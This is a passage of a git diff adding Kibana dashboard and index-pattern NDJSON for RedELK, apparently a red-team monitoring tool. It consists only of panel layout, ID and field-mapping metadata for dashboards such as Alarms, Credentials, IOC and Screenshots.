"231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1642171876916, 63], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1642171876916, 71], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1642171876916, 79], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":3,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":3,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":3,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":3,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":14,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1643016103992, 297], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1642171876916, 85], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC Types\",\"panelRefName\":\"panel_f13deeb7-53dc-41af-9de0-486d7a171916\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"w\":7,\"x\":24,\"y\":2},\"panelIndex\":\"133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"h\":19,\"i\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"w\":48,\"x\":0,\"y\":13},\"panelIndex\":\"d492599d-f662-450b-9982-54ab7db9f174\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_d492599d-f662-450b-9982-54ab7db9f174\"}]", "timeRestore": false, "title": "RedELK - IOC dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "name": "dfd53850-c595-4597-bbb5-ea03fc22e880:panel_dfd53850-c595-4597-bbb5-ea03fc22e880", "type": "visualization"}, {"id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "name": "f13deeb7-53dc-41af-9de0-486d7a171916:panel_f13deeb7-53dc-41af-9de0-486d7a171916", "type": "visualization"}, {"id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "name": "133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70:panel_133e1bfa-8bac-4ad1-92be-6c4cdf9dfd70", "type": "visualization"}, {"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "d492599d-f662-450b-9982-54ab7db9f174:panel_d492599d-f662-450b-9982-54ab7db9f174", "type": "search"}], "sort": [1642171876916, 91], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK screenshots dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\"},\"panelIndex\":\"d4eb5dce-3894-4599-8c17-042fc067d58c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots over time\",\"panelRefName\":\"panel_d4eb5dce-3894-4599-8c17-042fc067d58c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\"},\"panelIndex\":\"1db7741d-210a-4331-b1cb-affc6ac1334e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1db7741d-210a-4331-b1cb-affc6ac1334e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},\"panelIndex\":\"3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total screenshots\",\"panelRefName\":\"panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"66403011-8fb6-402f-b9b6-5f503d6df704\"},\"panelIndex\":\"66403011-8fb6-402f-b9b6-5f503d6df704\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Screenshots target users\",\"panelRefName\":\"panel_66403011-8fb6-402f-b9b6-5f503d6df704\"}]", "timeRestore": false, "title": "RedELK - Screenshots dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "name": "d4eb5dce-3894-4599-8c17-042fc067d58c:panel_d4eb5dce-3894-4599-8c17-042fc067d58c", "type": "visualization"}, {"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "1db7741d-210a-4331-b1cb-affc6ac1334e:panel_1db7741d-210a-4331-b1cb-affc6ac1334e", "type": "search"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0:panel_3e93acdc-89b4-45ad-9b5d-a3a67b55bdb0", "type": "visualization"}, {"id": "659280b0-d317-11ea-9301-a30a04251ae9", "name": "66403011-8fb6-402f-b9b6-5f503d6df704:panel_66403011-8fb6-402f-b9b6-5f503d6df704", "type": "visualization"}], "sort": [1642171876916, 97], "type": "dashboard", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson new file mode 100644 index 00000000..1f43fbee --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_.siem-signals.ndjson @@ -0,0 +1 @@ +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"as.organization.name\"}}},{\"count\":0,\"name\":\"client.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"client.as.organization.name\"}}},{\"count\":0,\"name\":\"client.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"client.geo.country_name\",\"type\":\"string\",\"esType